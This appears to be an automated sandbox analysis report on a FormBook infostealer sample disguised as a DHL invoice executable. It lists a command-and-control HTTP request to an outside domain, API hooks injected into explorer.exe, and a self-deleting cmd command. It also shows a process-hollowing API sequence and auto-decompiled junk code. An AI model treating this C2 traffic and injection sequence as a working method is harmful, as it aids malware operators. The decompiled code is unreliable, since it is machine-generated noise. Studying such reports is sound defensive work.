                  Dec 2, 2021 18:59:16.090806007 CET | 8.8.8.8 | 192.168.2.6 | 0xb04d | Name error (3) | www.mimamincloor.com | none | none | A (IP address) | IN (0x0001)

                  HTTP Request Dependency Graph

                  • www.federaldados.design

                  HTTP Packets

                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  0 | 192.168.2.6 | 49792 | 44.227.76.166 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Dec 2, 2021 18:58:55.346857071 CET | 11717 | OUT | GET /9gr5/?KrIxB=GtutZXLXlTaHD4Kp&WDH=t25TG+ulm10lwD+thJsAbOsGVXQVz47UhtdUUfJn66HyA3cvvtnG3RYsUIYwzVeadKzVomQtsQ== HTTP/1.1
                  Host: www.federaldados.design
                  Connection: close
                  Data Raw: 00 00 00 00 00 00 00
                  Data Ascii:
                  Dec 2, 2021 18:58:55.542661905 CET | 11717 | IN | HTTP/1.1 307 Temporary Redirect
                  Server: openresty
                  Date: Thu, 02 Dec 2021 17:58:55 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 168
                  Connection: close
                  Location: http://federaldados.design
                  X-Frame-Options: sameorigin
                  Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>


                  Code Manipulations

                  User Modules

                  Hook Summary

                  Function Name | Hook Type | Active in Processes
                  PeekMessageA | INLINE | explorer.exe
                  PeekMessageW | INLINE | explorer.exe
                  GetMessageW | INLINE | explorer.exe
                  GetMessageA | INLINE | explorer.exe

                  Processes

                  Process: explorer.exe, Module: user32.dll
                  Function Name | Hook Type | New Data
                  PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8C 0xCE 0xE1
                  PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x84 0x4E 0xE1
                  GetMessageW | INLINE | 0x48 0x8B 0xB8 0x84 0x4E 0xE1
                  GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8C 0xCE 0xE1

                  System Behavior

                  General

                  Start time:18:57:22
                  Start date:02/12/2021
                  Path:C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe"
                  Imagebase:0x4e0000
                  File size:449536 bytes
                  MD5 hash:EBCE26DA75669D94DBC0550BF394B204
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.363236510.00000000028A6000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.363182286.0000000002871000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  General

                  Start time:18:57:26
                  Start date:02/12/2021
                  Path:C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe
                  Imagebase:0x990000
                  File size:449536 bytes
                  MD5 hash:EBCE26DA75669D94DBC0550BF394B204
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  General

                  Start time:18:57:29
                  Start date:02/12/2021
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Explorer.EXE
                  Imagebase:0x7ff6f22f0000
                  File size:3933184 bytes
                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:high

                  General

                  Start time:18:58:00
                  Start date:02/12/2021
                  Path:C:\Windows\SysWOW64\msdt.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\msdt.exe
                  Imagebase:0xb30000
                  File size:1508352 bytes
                  MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:moderate

                  General

                  Start time:18:58:04
                  Start date:02/12/2021
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:/c del "C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe"
                  Imagebase:0x2a0000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:18:58:06
                  Start date:02/12/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff61de10000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Disassembly

                  Code Analysis

                    Executed Functions

                    APIs
                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05CA728E
                    Memory Dump Source
                    • Source File: 00000000.00000002.367090363.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: a31b8a7b0318d182396a6b3c9698bb798a97fa1671b1c34773c92a11c782d644
                    • Instruction ID: 2543967a0896568ffeb0ab285e10ae90619977149a16e749c4f2d7b66405ce4b
                    • Opcode Fuzzy Hash: a31b8a7b0318d182396a6b3c9698bb798a97fa1671b1c34773c92a11c782d644
                    • Instruction Fuzzy Hash: 9A913C71D0021A9FDB10CFA4C841BEEBBF2FF48318F158969D959A7240DB749A85CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00E29916
                    Memory Dump Source
                    • Source File: 00000000.00000002.362730649.0000000000E20000.00000040.00000001.sdmp, Offset: 00E20000, based on PE: false
                    Similarity
                    • API ID: HandleModule
                    • String ID:
                    • API String ID: 4139908857-0
                    • Opcode ID: cf9eee75f5bd8d7f088a832a16b37d005887aa5652dc1747c42c9159866c3ad5
                    • Instruction ID: edfe5a441c70f6270f39c96fc7e4431c60accf6c1716016b88789d234c17340f
                    • Opcode Fuzzy Hash: cf9eee75f5bd8d7f088a832a16b37d005887aa5652dc1747c42c9159866c3ad5
                    • Instruction Fuzzy Hash: 1E714570A10B158FDB24DF6AE44579AB7F5FF88304F00992EE48AE7A41D735E805CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateActCtxA.KERNEL32(?), ref: 00E25401
                    Memory Dump Source
                    • Source File: 00000000.00000002.362730649.0000000000E20000.00000040.00000001.sdmp, Offset: 00E20000, based on PE: false
                    Similarity
                    • API ID: Create
                    • String ID:
                    • API String ID: 2289755597-0
                    • Opcode ID: 5ec147f359b09be6ab7c998b2cb2f85ba364d0fa0d36d662611171e525db4716
                    • Instruction ID: c8e69928142167e5b9de8b32dd8b3be8d41e1d59d2817e824dc36222082c1bf2
                    • Opcode Fuzzy Hash: 5ec147f359b09be6ab7c998b2cb2f85ba364d0fa0d36d662611171e525db4716
                    • Instruction Fuzzy Hash: 774102B1C00619CEDB24DFA9D844BCDBBB5BF88308F20846AD419BB250DB716985CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateActCtxA.KERNEL32(?), ref: 00E25401
                    Memory Dump Source
                    • Source File: 00000000.00000002.362730649.0000000000E20000.00000040.00000001.sdmp, Offset: 00E20000, based on PE: false
                    Similarity
                    • API ID: Create
                    • String ID:
                    • API String ID: 2289755597-0
                    • Opcode ID: 9888f8a8951a3ba6b2a8edab8ab9de71b61d1678a49607a44fb165c68deae96b
                    • Instruction ID: df8750f681dd4270fa8580eace57f1ad3bc2795a680bd7b68b1f556aebe9a9a7
                    • Opcode Fuzzy Hash: 9888f8a8951a3ba6b2a8edab8ab9de71b61d1678a49607a44fb165c68deae96b
                    • Instruction Fuzzy Hash: C4410271C00618CFDB24DFA9D844BDDBBB5BF48308F208469D419BB251DB716985CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05CA6E60
                    Memory Dump Source
                    • Source File: 00000000.00000002.367090363.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: 4387d029ae6bbb207a916362f8d277dbf872002d9499ee971e54a60d98860822
                    • Instruction ID: 5287bae141c2ff6a13d349d16fe30018d98f7e250e474ffce2820debe7bf127f
                    • Opcode Fuzzy Hash: 4387d029ae6bbb207a916362f8d277dbf872002d9499ee971e54a60d98860822
                    • Instruction Fuzzy Hash: FB213575D003099FCF10CFA9C880BEEBBF5BB48324F148829E919A7240D7789950CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00E2BBB6,?,?,?,?,?), ref: 00E2BC77
                    Memory Dump Source
                    • Source File: 00000000.00000002.362730649.0000000000E20000.00000040.00000001.sdmp, Offset: 00E20000, based on PE: false
                    Similarity
                    • API ID: DuplicateHandle
                    • String ID:
                    • API String ID: 3793708945-0
                    • Opcode ID: 9e3a4db854325ff5c37386affc0b02cc83ab04734b96e1bdc642bf58f4a5e70f
                    • Instruction ID: d9f116032aecc91779cff689a6f916c4ddf99759bad252083c562d58d6242551
                    • Opcode Fuzzy Hash: 9e3a4db854325ff5c37386affc0b02cc83ab04734b96e1bdc642bf58f4a5e70f
                    • Instruction Fuzzy Hash: 5A21E3B5900218AFDB10CF9AD985AEEFBF8EB48324F14841AE914B3310D774A954CFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00E2BBB6,?,?,?,?,?), ref: 00E2BC77
                    Memory Dump Source
                    • Source File: 00000000.00000002.362730649.0000000000E20000.00000040.00000001.sdmp, Offset: 00E20000, based on PE: false
                    Similarity
                    • API ID: DuplicateHandle
                    • String ID:
                    • API String ID: 3793708945-0
                    • Opcode ID: 8e7caf28c271ccd588c473e739fdaeea34a4f393c5f032524ec4f727ebe4e5c3
                    • Instruction ID: f2c54ec089d0b0949fbe05031711cb659946df9e86f644b6f540ec8a0fae257e
                    • Opcode Fuzzy Hash: 8e7caf28c271ccd588c473e739fdaeea34a4f393c5f032524ec4f727ebe4e5c3
                    • Instruction Fuzzy Hash: 2121E0B5D002589FDB10CFAAD985AEEFBF8EB48324F14842AE954B3350C774A954CF60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05CA6F40
                    Memory Dump Source
                    • Source File: 00000000.00000002.367090363.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                    Similarity
                    • API ID: MemoryProcessRead
                    • String ID:
                    • API String ID: 1726664587-0
                    • Opcode ID: bf1bbf62e4a713f08ac5dfe598140491c3ebed5632b7cc1cfdf5dde008ca9e69
                    • Instruction ID: 655f94d52d6dd798b5f4e056c4f864db9325446c9f487f48e7e9544dc0d7023a
                    • Opcode Fuzzy Hash: bf1bbf62e4a713f08ac5dfe598140491c3ebed5632b7cc1cfdf5dde008ca9e69
                    • Instruction Fuzzy Hash: 7A2116B5C003499FCB10DFAAC884AEEBBF5FF48324F548829E519A7240D7389954CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetThreadContext.KERNELBASE(?,00000000), ref: 05CA6CB6
                    Memory Dump Source
                    • Source File: 00000000.00000002.367090363.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                    Similarity
                    • API ID: ContextThread
                    • String ID:
                    • API String ID: 1591575202-0
                    • Opcode ID: c6f3df0a80515339a0d9d63ef09675abb31fea7fdbbe99cc0dbce0e7829fc6e2
                    • Instruction ID: e6e1be2a9b51e9f83a7b83dd9ec86d5a0b38e0bb8f8e28595985f22f0e9bdf36
                    • Opcode Fuzzy Hash: c6f3df0a80515339a0d9d63ef09675abb31fea7fdbbe99cc0dbce0e7829fc6e2
                    • Instruction Fuzzy Hash: F9211871D003098FDB10DFAAC4857EEBBF5EF48228F548829D519A7340DB78A945CFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E28,?,?,05CA94D8,038740CC,02890178), ref: 05CA9569
                    Memory Dump Source
                    • Source File: 00000000.00000002.367090363.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                    Similarity
                    • API ID: EnumThreadWindows
                    • String ID:
                    • API String ID: 2941952884-0
                    • Opcode ID: e99e5b8df6776d080aa94bc581b803ba9c4cafadf13ad7d82e54ffa31ac4bc01
                    • Instruction ID: 312f1ed28fed9752b7a64fd5c4a879fc24abe9d9df8a3e277ced8e00b3f5f71e
                    • Opcode Fuzzy Hash: e99e5b8df6776d080aa94bc581b803ba9c4cafadf13ad7d82e54ffa31ac4bc01
                    • Instruction Fuzzy Hash: 6C2118719042098FDB10CF9AC885BEEFBF9EB88324F14882AD515A7340D774A945CFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • MessageBoxW.USER32(?,00000000,00000000,?), ref: 05CA9A65
                    Memory Dump Source
                    • Source File: 00000000.00000002.367090363.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                    Similarity
                    • API ID: Message
                    • String ID:
                    • API String ID: 2030045667-0
                    • Opcode ID: 29232fc746e87d92ec02eead2ef23dcbef561f641d4de3017e9717582024ba08
                    • Instruction ID: b13d3f772d741a53a1250017de52b1b8059371893f1d37900499229df39036b0
                    • Opcode Fuzzy Hash: 29232fc746e87d92ec02eead2ef23dcbef561f641d4de3017e9717582024ba08
                    • Instruction Fuzzy Hash: 832113B6C003099FCB10CF9AC885ADEFBB5FB88314F54892ED419A7200C374A944CFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E29991,00000800,00000000,00000000), ref: 00E29BA2
                    Memory Dump Source
                    • Source File: 00000000.00000002.362730649.0000000000E20000.00000040.00000001.sdmp, Offset: 00E20000, based on PE: false
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: d7991679f826dc2a00f576ee36a0ed2048c0067a461dee6792e61d3067b5d603
                    • Instruction ID: 0a0ee0209fc41fd4f145157fa00b5e228085e96d65549a56ede3b44ad6af0f52
                    • Opcode Fuzzy Hash: d7991679f826dc2a00f576ee36a0ed2048c0067a461dee6792e61d3067b5d603
                    • Instruction Fuzzy Hash: DD1114B69002199FDB10CF9AE444ADEFBF8EB88324F14842AE915B7300C775A945CFA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E29991,00000800,00000000,00000000), ref: 00E29BA2
                    Memory Dump Source
                    • Source File: 00000000.00000002.362730649.0000000000E20000.00000040.00000001.sdmp, Offset: 00E20000, based on PE: false
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: a193f695b25d915234c330fd4b756ccc81ca18c7f20ba0bf9437a5da01f498c0
                    • Instruction ID: 43a829de18df4ce7fcecbd798a0ccda44a19854937609a91cb6bbe1b9d2aeb27
                    • Opcode Fuzzy Hash: a193f695b25d915234c330fd4b756ccc81ca18c7f20ba0bf9437a5da01f498c0
                    • Instruction Fuzzy Hash: 6B1114B68003098FCB10CF9AD444BDEFBF8AB88324F14852AE915B7200C379A555CFA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05CA6D7E
                    Memory Dump Source
                    • Source File: 00000000.00000002.367090363.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: a6002c7689f577a5df7698e1efb6f8996dd89bd3c4dbb44ba7ed63585e75caaf
                    • Instruction ID: bb129181985ac6af008b3300617c9d5749c027c8679da6ead71906197ac2f09a
                    • Opcode Fuzzy Hash: a6002c7689f577a5df7698e1efb6f8996dd89bd3c4dbb44ba7ed63585e75caaf
                    • Instruction Fuzzy Hash: CE112972D002499FCF10DFA9C8446EFBBF9AB48324F148819D515A7250C7799550CFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,05CAC461,?,?), ref: 05CAC608
                    Memory Dump Source
                    • Source File: 00000000.00000002.367090363.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                    Similarity
                    • API ID: ChangeCloseFindNotification
                    • String ID:
                    • API String ID: 2591292051-0
                    • Opcode ID: 6ca250dacc696147946677ee69e99022402cb2388812b659f8e3e544366a56ae
                    • Instruction ID: f1cd551e630c854efc6741aba9ad7810de6f62ac00a6a79666cd191b5d058d75
                    • Opcode Fuzzy Hash: 6ca250dacc696147946677ee69e99022402cb2388812b659f8e3e544366a56ae
                    • Instruction Fuzzy Hash: 98113AB58007098FCB10DF99C4457DEBBF4EB88324F148829E915B7341D738A954CFA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.367090363.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: bf1dc06c396198091e360f213bcba853834cfce7f1cac09cec2c89c924b5eaee
                    • Instruction ID: 33ea1e336aa9034fb026f28308f4d2331bd3d60862ea74806c0a1360c8ce65b2
                    • Opcode Fuzzy Hash: bf1dc06c396198091e360f213bcba853834cfce7f1cac09cec2c89c924b5eaee
                    • Instruction Fuzzy Hash: CE110AB5D003498FDB10DFAAC8457EFFBF9AB88228F248829D515A7240D775A944CFA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00E29916
                    Memory Dump Source
                    • Source File: 00000000.00000002.362730649.0000000000E20000.00000040.00000001.sdmp, Offset: 00E20000, based on PE: false
                    Similarity
                    • API ID: HandleModule
                    • String ID:
                    • API String ID: 4139908857-0
                    • Opcode ID: 2273397eaa8847f5748e0c9e53c1e0c66fedb7ab7998b51765c211d645cfa527
                    • Instruction ID: cfebffaf874d521eaca6133776f57a4087e22dae01cfca0cb630dae941279795
                    • Opcode Fuzzy Hash: 2273397eaa8847f5748e0c9e53c1e0c66fedb7ab7998b51765c211d645cfa527
                    • Instruction Fuzzy Hash: AF110FB5C002498FCB10CF9AD844ADEFBF8EB89324F14842AD429B7600C374A545CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • OleInitialize.OLE32(00000000), ref: 05CA901D
                    Memory Dump Source
                    • Source File: 00000000.00000002.367090363.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: 7ef31ecc53f049c23310dcff21d46144bb9b5e6b002a9b6f24c7abbf175341fc
                    • Instruction ID: 20e4f755bc0a1ab2e5fe33ff307dec0b81d65283b54883cdab80380348f58414
                    • Opcode Fuzzy Hash: 7ef31ecc53f049c23310dcff21d46144bb9b5e6b002a9b6f24c7abbf175341fc
                    • Instruction Fuzzy Hash: 751133B58003498FCB20DF9AD4857DEBBF8EB48328F208819E519B3300C374A944CFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • PostMessageW.USER32(?,?,?,?), ref: 05CA9DED
                    Memory Dump Source
                    • Source File: 00000000.00000002.367090363.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                    Similarity
                    • API ID: MessagePost
                    • String ID:
                    • API String ID: 410705778-0
                    • Opcode ID: 512ff1b3df4fc55cf231c5d397d198179c0576cc25c4144934fc41affb88ab0f
                    • Instruction ID: a766446411b18cef074334ddff6776e14a868c4ff7197ce01ba72d0c794c8b71
                    • Opcode Fuzzy Hash: 512ff1b3df4fc55cf231c5d397d198179c0576cc25c4144934fc41affb88ab0f
                    • Instruction Fuzzy Hash: B711D0B58003499FDB10DF9AD885BDEBBF8EB48324F14881AE515A7600C375AA94CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    C-Code - Quality: 85%
                    			E004E2855(signed int __eax, signed int* __ebx, signed int __ecx, signed int __edx, void* __edi, signed int __esi) {
                    				signed int _t177;
                    				signed char _t179;
                    				signed char _t180;
                    				signed char _t181;
                    				signed char _t331;
                    				signed char _t332;
                    				signed int _t334;
                    				signed int* _t337;
                    				void* _t338;
                    				void* _t422;
                    				signed int _t428;
                    				void* _t431;
                    
                    				_t422 = __edi;
                    				_t398 = __edx;
                    				_t361 = __ecx;
                    				_t337 = __ebx;
                    				_t175 = __eax;
                    				_t428 = __esi ^ __eax;
                    				 *__ebx =  *__ebx | __edx;
                    				 *__ecx =  *__ecx | __edx;
                    				 *__edx =  *__edx | __ecx;
                    				 *__eax =  *__eax + __eax;
                    				 *__ebx =  *__ebx + __edx;
                    				 *__ebx =  *__ebx ^ __eax;
                    				 *__eax =  *__eax + __edx;
                    				 *__eax =  *__eax + __eax;
                    				 *__eax =  *__eax + __edx;
                    				 *__eax =  *__eax + __eax;
                    				asm("adc [edx], eax");
                    				if( *__eax != 0) {
                    					L3:
                    					_t177 = (_t175 |  *_t428) -  *(_t175 |  *_t428);
                    					 *_t177 =  *_t177 + _t177;
                    					asm("adc esi, [eax]");
                    					 *_t177 =  *_t177 + _t177;
                    					 *_t177 =  *_t177 | _t177;
                    					 *_t177 =  *_t177 + _t177;
                    					asm("adc [eax], eax");
                    					 *_t361 =  *_t361 + _t398;
                    					_t337 = _t337 + _t337[7];
                    					 *_t177 =  *_t177 + _t177;
                    					_push(es);
                    					_t179 = _t177 + 0xa -  *((intOrPtr*)(_t177 + 0xa));
                    				} else {
                    					 *__eax =  *__eax + __eax;
                    					_t179 = __eax + 0x2b;
                    					_pop(ss);
                    					 *_t179 =  *_t179 + _t179;
                    					_t361 = __ecx |  *__edx;
                    					_push(es);
                    					_t398 = __edx -  *__ebx;
                    					 *_t361 =  *_t361 ^ _t179;
                    					 *_t361 =  *_t361 + _t361;
                    					 *_t179 =  *_t179 + _t179;
                    					 *_t361 =  *_t361 + _t179;
                    					 *_t179 =  *_t179 + _t179;
                    					asm("adc [edx], eax");
                    					if( *_t179 == 0) {
                    						 *_t179 =  *_t179 + _t179;
                    						_t175 = _t179 + 0xa;
                    						goto L3;
                    					}
                    				}
                    				 *_t179 =  *_t179 + _t179;
                    				 *_t428 = _t337 +  *_t428;
                    				_t180 = _t179 +  *_t337;
                    				if(_t180 < 0) {
                    					 *_t180 =  *_t180 + _t180;
                    					_t334 = _t180 + 0x7f;
                    					 *_t334 =  *_t334 & _t334;
                    					 *((intOrPtr*)(_t398 + _t431)) =  *((intOrPtr*)(_t398 + _t431)) + _t334;
                    					asm("adc esi, [eax]");
                    					 *_t334 =  *_t334 + _t334;
                    					 *_t334 =  *_t334 | _t334;
                    					 *_t334 =  *_t334 + _t334;
                    					 *_t334 =  *_t334 + _t334;
                    					 *_t361 =  *_t361 + _t398;
                    					_t337 = _t337 + _t337[8];
